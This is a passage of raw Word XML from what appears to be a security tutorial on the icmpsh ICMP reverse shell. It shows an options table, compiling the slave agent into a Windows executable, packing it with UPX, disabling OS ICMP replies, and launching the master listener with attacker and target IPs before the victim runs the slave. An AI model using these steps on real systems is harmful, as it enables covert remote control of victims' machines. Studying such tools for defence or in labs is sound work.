      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="0479F16C" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15C85FFA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4316A7E7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57341797" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Delay between requests (milliseconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="207DA98C" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="552F6F7C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17D4CB2E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59836319" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Timeout value (milliseconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="1A1E7A92" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FDE362E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>195</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AD13FC7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>max_blanks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2888908F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Maximum unanswered ICMP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="779866B3" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E50E47E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>197</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="205A8B1E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>max_data_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C97D377" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Maximum data buffer size in bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CA8E581"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It can easily be compiled using MingW on both Linux and Windows. I will be demonstrating how to compile on Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66793EBB"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Install MingW and run the following command to compile the C file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546886F7"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i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E954F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337ADFCA" wp14:editId="0BE80B72">
            <wp:extent cx="5943600" cy="1212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212850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82E0E6" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 8: Compile code and generate Windows executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAB24A"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Compress the executable using UPX Packer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96BFD0"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upx -9 -v -o icmp-slave-complete-upx.exe icmp-slave-complete.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68495D03" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600BDDB1" wp14:editId="4244C1DE">
            <wp:extent cx="5943600" cy="1289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89050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61821CBF" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 9: Compress original executable using UPX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795B15D"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There is a 56.69% reduction in file size after compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C21ECB" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62CE3112" wp14:editId="1B3D6E10">
            <wp:extent cx="5200650"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0650" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46241BB3" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 10: File size difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72478694"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Make sure that ICMP replies set by the OS are disabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02D2D4"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sysctl -w net.ipv4.icmp_echo_ignore_all=1 &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EDA9F"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Execute the master ICMP Shell Agent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5C3CD"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./icmpsh_m.py &lt;attacker_ip&gt; &lt;target_ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>./icmpsh_m.py 10.0.0.8 10.0.0.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65789A"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lastRenderedPageBreak/>
        <w:t>After starting the listener on the attacker’s machine, run the ICMP slave agent on the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0595A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
